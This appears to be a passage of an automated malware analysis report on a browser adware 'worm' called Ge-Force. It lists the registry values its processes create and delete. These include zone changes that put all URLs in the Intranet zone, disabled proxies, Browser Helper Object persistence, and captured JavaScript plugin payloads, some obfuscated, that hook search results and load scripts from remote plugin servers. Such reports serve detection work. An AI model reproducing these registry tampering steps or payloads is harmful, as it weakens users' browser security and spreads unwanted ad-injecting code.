[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 3B B8 98 C0 3E 1C 13 AA 25 7E 13 60 E7 DA C3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Ge-Force-codedownloader.exe:2564 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 8A EA 02 46 B1 54 1E 18 F1 0E CA 5C 93 93 E3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ge-Force"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}]
"(Default)" = "ISandBox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
"(Default)" = "Ge-Force"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129 Type Library"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"Version" = "1.0"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\0\win32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 CF F8 5D EB 30 6B 3C 3D 18 05 8A 10 0B BE F6"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}]
"(Default)" = "ICrossriderBHO"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
"(Default)" = ""

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
"NoExplorer" = "1"

"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

The Worm deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]

The process Khtmovq.exe:664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Ge-Force\Plugins\192]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/192.js"

[HKCU\Software\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\17]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/17.js"

[HKCU\Software\Ge-Force\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

[HKCU\Software\Ge-Force\Plugins\22]
"Name" = "resources"

[HKCU\Software\Ge-Force\Plugins\39]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url"

    [HKCU\Software\Ge-Force\Plugins\301]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\262]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/262.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\Ge-Force\Manifest]
    "PublisherId" = "21836"

    [HKCU\Software\Ge-Force\Plugins\262]
    "Name" = "pops_5_j_m"

    [HKCU\Software\Ge-Force\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\Ge-Force\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi"

    [HKCU\Software\Ge-Force\Plugins\242]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Ge-Force\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)a"

    [HKCU\Software\Ge-Force\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Ge-Force\Plugins\337]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:TEN}))();};"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Ge-Force\Plugins\288]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/288.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Ge-Force\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Ge-Force\Installer]
    "CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

    [HKCU\Software\Ge-Force\Plugins\14]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/14.js"

    [HKCU\Software\Ge-Force\Manifest]
    "UninstallerOfferUrl" = "NA"
    "DisableIe" = "true"

    [HKCU\Software\Ge-Force\Plugins\246]
    "JavaScript" = "var _0x6ef5=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

    [HKCU\Software\Ge-Force\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\Ge-Force\Plugins\337]
    "Name" = "icm_ten_m"

    [HKCU\Software\Ge-Force\Plugins\39]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/39.js"

    [HKCU\Software\Ge-Force\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\Ge-Force\Plugins\301]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ODU2NTg0YjU2NDgwNDFmMDAxZjM3MDQxNDQ5NGM0YTRlMDMwMDFiMTI0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU1ZDE5NWEwYzBlMTkwZDBmMTAxODAzMDUwMDQxMGMxMzBjNDQxNzFhMWM0NDE4NDEwODA1NDcwODI3MmI1MTBkMTUwMzExMTM1ZTA4MTcwNzFjMGExZDA4MGMzZjFjNTYyOTM1MmYzOTNiM2MzMTI0MzEyZjMzMzgzMzI4MzUyMjMyMjkzMTJmMjkzNTRhMDgxYjFhMGMwMjBhMTIzNTA1MDgwZTQ5MzAzZDM1MmEyNDI1MzkzZTIyMzAyYTMwMjkzYjI0MjMyNDM4MzkyZDMwMjEzOTNjMmUyOTM1NGEwOTA2MDAxNTA1MWQxOTM1MDUwODBlNDkzMDNkMzUyYTI0MjUzOTNlMjIzMDJhMzAyOTNhMzkzOTNkM2YyZTI2MzAzZDUwMTkxYjA2MjMyODU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTIzMjgzNDJiNDkwMzA2MDgyNTE3MDcwOTU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTI0MmQyNjMxMzAzZDUwMzEyOTNmMjk1MTM0MmIyYzMwMzkyYjM4MjQyMzI4MmUyNjMwMmIzODJiM2YzNzI2MjAyZTI2MzAzNzI1M2QzOTI5MjMyODM0MmI0OTExMDMxYTIyMzI1NzMzMzQzNzNkMmQyNTJiMzkzZjJlMjkzOTJiMmEzYTIyM2QyNTMyMmYyODM0MjczYTIwMjkzMTJmMjkzNTRhMTk0OTMwM2QyNDM2MmYyOTM1NGU0NzdlNGY0MjU2NTg0OTFlMWUxODFiMDczYTEwMWE1YTUxNTY0ODA0MWYwMDFmMTE0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU"

    [HKLM\SOFTWARE\Ge-Force\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Ge-Force\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Ge-Force\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Ge-Force\Installer]
    "Time" = "1421039403"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\184]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/184.js"

    [HKCU\Software\Ge-Force\Plugins\40]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/40.js"

    [HKCU\Software\Ge-Force\Installer]
    "AdditionalInfo" = "{""asw"":[0, 1073750528, -2147483648, 0],""browser_name"":""ie""
    "StatsDomain" = "http://stats.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\Ge-Force\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveI"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"

    [HKCU\Software\Ge-Force\Plugins\350]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/350.js"

    [HKCU\Software\Ge-Force\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Ge-Force\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\Ge-Force\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Ge-Force\Plugins\45]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/45.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\356]
    "Name" = "icm_man_m"

    [HKCU\Software\Ge-Force\Manifest]
    "EnableSearchIE" = "false"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Ge-Force\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Ge-Force\Plugins\78]
